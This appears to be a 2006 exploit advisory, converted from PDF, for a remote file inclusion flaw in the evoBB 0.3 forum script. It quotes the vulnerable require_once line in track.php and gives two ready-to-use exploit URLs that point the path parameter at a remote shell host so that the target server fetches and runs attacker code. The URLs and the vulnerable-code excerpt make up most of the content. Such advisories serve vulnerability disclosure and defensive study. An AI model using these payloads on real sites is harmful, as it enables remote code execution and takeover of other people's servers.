evoBB 0.3 path Remote File Include Vulnerability.pdf

1 #============================================================================================== 2 #evoBB <= v0.3 (path) Remote File Inclusion Exploit 3 #=============================================================================================== 4 # 5 #Critical Level : Dangerous 6 # 7 #Venedor site : http://www.4yougratis.it/script_php/forum/evoBBv0.3.htm 8 # 9 #Version : v0.3 10 # 11 #================================================================================================ 12 #Bug in : track.php 13 # 14 #Vlu Code : 15 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 16 # 17 # require_once($path.’connect.php’); 18 # 19 #================================================================================================ 20 # 21 #Exploit : 22 #−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−− 23 # 24 #http://sitename.com/[Script Path]/track.php?path=http://SHELLURL.COM 25 #http://sitename.com/[Script Path]/connect.php?path=http://SHELLURL.COM 26 # 27 #================================================================================================ 28 #Discoverd By : SHiKaA 29 # 30 #Conatact : SHiKaA−[at]hotmail.com 31 # 32 #Special Thx To : Str0ke & simoo & Timq & XoRoN & Saudi HAckerz 33 ================================================================================================== 34 35 # milw0rm.com [2006−09−25] Page 1/1 evoBB 0.3 path Remote File Include Vulnerability SHiKaA 09/25/2006